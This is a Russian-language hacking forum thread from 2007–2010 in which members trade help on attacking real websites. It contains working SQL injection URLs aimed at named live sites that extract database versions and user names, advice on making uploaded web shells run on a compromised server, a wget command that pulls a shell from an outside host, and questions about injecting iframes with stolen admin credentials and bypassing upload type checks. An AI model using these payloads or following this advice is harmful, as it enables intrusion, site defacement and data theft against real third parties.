Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    177
    Likes Received:
    102
    Reputations:
    23
    Кинь адрес сайта в ПМ попробую посмотреть...
     
  2. FAPSI

    FAPSI Banned

    Joined:
    18 Sep 2008
    Messages:
    21
    Likes Received:
    3
    Reputations:
    0
    Сделать ничего нельзя?
     
  3. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    378
    Likes Received:
    346
    Reputations:
    292
    нет..
     
    _________________________
    1 person likes this.
  4. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Люди подскажите если в ошибке, что-то типа:
    Что это значит? Дайте ссыль на инфу по этих инъекциях.
     
  5. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    100
    Likes Received:
    13
    Reputations:
    2
    Есть слепая sql, не могу вывести из таблицы поля, помогите. Таблица ollis, смотрю так же inf_sch, что не то?

    http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
     
    1 person likes this.
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196

    обычная скуля мускульная , только скрипт на coldfusion и, походу, требует чтоб ID был цифровой - внедрить что-либо нельзя (это просто предположение, исходя из того что ты дал)
     
  7. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Вот смотри:
     
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    Как сказал попугай, это просто ошибка из-за того что GET параметр ID не числовой, это так принято выводить ошибки в ASP.NET, и т.п. системах )
     
  9. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    198
    Likes Received:
    195
    Reputations:
    91

    А зачем получать именно в таком виде ошибку? Главное же, что вывод данных есть. Можно данные ещё конкатенизировать с какими-то символами, провоцирующими ошибку при exec.
     
    2 people like this.
  10. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    310
    Reputations:
    163
    порутал сервер,когда заливаю на сайты шеллы и потом обращаюсь к ним из веба,то выдает такую ошибку -

    Code:
    UID of script "/home/*****/public_html/shell.php" is smaller than min_uid
    
    выставил чмоды и выдает уже такую ошибку -

    Code:
    File "/home/*****/public_html/shell.php" is writeable by group
    
    как сделать что бы шелл нормально работал?
     
    #11910 .:[melkiy]:., 20 Mar 2010
    Last edited: 20 Mar 2010
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196

    шелл должен иметь владельца такого же, как и все файлы в папке (chown ufaserv wso.php) и права 755
     
    2 people like this.
  12. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    310
    Reputations:
    163
    GID of script "/home/*****/public_html/wso2.php" is smaller than min_gid

    :(

    UPD: chown username:username * -R , так заработало


    wget http://yoursite.ru/shell.php -O yaneshell.php

    xeksite.ru/yaneshell.php
     
    #11912 .:[melkiy]:., 20 Mar 2010
    Last edited: 20 Mar 2010
    1 person likes this.
  13. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    я открыл консоль на сервере..как закачать полноценный шелл ? права рут.
     
  14. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Скажите, как можно имея ник и пасс админа, изменить исходный код сайта (например ифрейм поставить)? На сайте не возможно залогинится. Как можно реализовать?
     
    1 person likes this.
  15. Life7

    Life7 Banned

    Joined:
    14 Jun 2009
    Messages:
    199
    Likes Received:
    54
    Reputations:
    0
    Имеется такой код:

    Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?
     
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
    Да.
     
    2 people like this.
  17. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    236
    Likes Received:
    11
    Reputations:
    -4
    Не понял )).Ну,как бы команды wget,lynx,source никто не отменял:).И вообще,консолей много всяких...может,ты вообще сидел за терминалом рядом с системником?))))

    ЗЫ: Я так понял,у тебя bash/csh или чет такое.
     
  18. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    http://www.simqam.com/products.php?cid=48%2b1=1
     
    #11918 Darren, 20 Mar 2010
    Last edited: 20 Mar 2010
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Какбы там блайнд:
    http://www.simqam.com/products.php?cid=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))--+

    Result:
    Duplicate entry '5.0.67-log1'
     
    1 person likes this.
  20. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6

    Sorry за возможно глупый вопрос
    В блайндах всегда возможно только выводить по одной строке(значению) или есть такой запрос позволяющий выводить сразу столбом. FAQ я читал и не раз и не два
    т.е. например я делаю такой запрос

    +UNION+SELECT+*+FROM(SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%20name%20FROM%20users%20LIMIT%200,1),%2014)d)+as+t+JOIN(SELECT%20NAME_CONST((SELECT%20name%20FROM%20users%20LIMIT%200,1),14)e)b)a%20--

    выводит: Duplicate entry: qwerqwer

    Выводит только одно значение хоть с лимитом, хоть без него можно ли вывести данные целиком?
     
Loading...
Thread Status:
Not open for further replies.